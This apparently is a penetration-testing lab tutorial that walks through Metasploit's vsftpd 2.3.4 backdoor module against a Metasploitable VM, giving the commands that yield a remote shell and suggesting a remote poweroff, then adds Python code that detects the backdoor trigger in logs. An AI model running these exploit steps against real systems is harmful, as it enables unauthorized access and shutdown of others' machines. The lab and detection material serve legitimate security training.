Continuing from our previous tutorial on how to target a Metasploitable machine with postgresql, we will try a different attack using FTP.
In our Kali Linux machine we have already run nmap and identified our target machine. It has FTP port 21 open.
Metasploitable is running vsftpd. If a username is sent that ends in the sequence :) [ a happy face ] it will open a shell on port 6200.
Open a terminal and start up Metasploit with msfconsole. Once we are in, type search vsftp
msf6 > search vsftp
We will see one result, exploit/unix/ftp/vsftpd_234_backdoor, and it’s rated “excellent”. So let’s give it a try.
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
Now we will set up this exploit. Type options and then we can set up the target settings.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
It’s pretty simple: we need to set the target host and port, RHOSTS and RPORT.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.0.2.6
RHOSTS => 10.0.2.6
RHOSTS is the IP address of our target machine, identified as 10.0.2.6 in this case. The RPORT is the open FTP port identified in nmap as port 21, the standard FTP port.
Now simply type exploit and hit enter.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
The exploit script will run and a connection will be made, giving you a Linux shell.
Now let’s check what files and directories there are with dir
We could now remotely shut down the system with the standard Linux command poweroff
And that’s all folks! Another Metasploitable exploit. Of course, this information is given for educational purposes only. We illustrate how easy it is for people to gain access to your system if you leave it unsecured. Also, for those who are engaged in ethical hacking and penetration testing, it is important to learn the various exploits available and be familiar with their execution. That way you will identify them on your target machines and be able to advise your client of the exposure their system has.
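From the defender's side, the behaviour described above (an FTP username ending in :) followed by a shell on port 6200) leaves a clear trail to alert on. The following is an added example, not part of the original tutorial or of Metasploit: it correlates the two events in a log. The log format, the sample lines, the 60-second window and the names parse and detect are all assumptions made for the illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events in a hypothetical "time kind key=value ..." format.
SAMPLE_LOG = """\
2024-05-01T10:00:01 FTP src=10.0.2.15 dst=10.0.2.6 cmd=USER arg=anonymous
2024-05-01T10:00:09 CONN src=10.0.2.15 dst=10.0.2.6 dport=21
2024-05-01T10:02:30 FTP src=10.0.2.15 dst=10.0.2.6 cmd=USER arg=backup:)
2024-05-01T10:02:32 CONN src=10.0.2.15 dst=10.0.2.6 dport=6200
2024-05-01T10:07:00 FTP src=10.0.2.20 dst=10.0.2.7 cmd=USER arg=smile:)
2024-05-01T11:30:00 CONN src=10.0.2.20 dst=10.0.2.7 dport=6200
"""

LINE_RE = re.compile(r"^(\S+) (FTP|CONN) (.+)$")
TRIGGER_SUFFIX = ":)"            # username ending described in the article
SHELL_PORT = "6200"              # port the article says the shell opens on
WINDOW = timedelta(seconds=60)   # assumed correlation window

def parse(line):
    """Split one event line into (timestamp, kind, fields) or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, kind, rest = m.groups()
    fields = dict(kv.split("=", 1) for kv in rest.split() if "=" in kv)
    if not {"src", "dst"} <= fields.keys():
        return None
    return datetime.fromisoformat(ts), kind, fields

def detect(log_text):
    """Return (alert, server, client, username) tuples in log order."""
    pending = {}   # server IP -> (time of trigger, username)
    alerts = []
    for line in log_text.splitlines():
        event = parse(line)
        if event is None:
            continue
        ts, kind, f = event
        if (kind == "FTP" and f.get("cmd") == "USER"
                and f.get("arg", "").endswith(TRIGGER_SUFFIX)):
            pending[f["dst"]] = (ts, f["arg"])
            alerts.append(("trigger-username", f["dst"], f["src"], f["arg"]))
        elif kind == "CONN" and f.get("dport") == SHELL_PORT:
            seen = pending.get(f["dst"])
            # Only correlate when the connection closely follows a trigger.
            if seen and timedelta(0) <= ts - seen[0] <= WINDOW:
                alerts.append(("backdoor-session", f["dst"], f["src"], seen[1]))
    return alerts
```

Calling detect(SAMPLE_LOG) yields a trigger-username alert for each smiley login and a backdoor-session alert only for 10.0.2.6, where the port 6200 connection follows the login within the window.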